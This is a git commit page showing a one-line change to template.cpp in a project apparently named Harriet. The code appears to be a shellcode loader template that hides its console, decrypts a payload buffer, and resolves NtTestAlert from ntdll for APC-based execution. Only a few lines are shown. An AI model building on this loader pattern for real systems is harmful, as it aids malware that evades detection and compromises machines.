Browse Source

Update template.cpp

Fixing bugs
assume-breach 2 years ago
parent
commit
ea650b5bf5
1 changed files with 1 additions and 1 deletions
  1. 1 1
      Harriet/Harriet/QueueUserAPC/template.cpp

+ 1 - 1
Harriet/Harriet/QueueUserAPC/template.cpp

@@ -52,7 +52,7 @@ int main()
         
       
 	FreeConsole();
-	Random6 Random7 = (Random6)(GetProcAddress(GetModuleHandleA(sNTD), sTest));
+	Random6 Random7 = (Random6)(GetProcAddress(GetModuleHandleA("ntdll"), "NtTestAlert"));
 	SIZE_T Random4 = sizeof(Random3);
 	
 	Random1((char *) Random3, Random3_len, Random2, sizeof(Random2));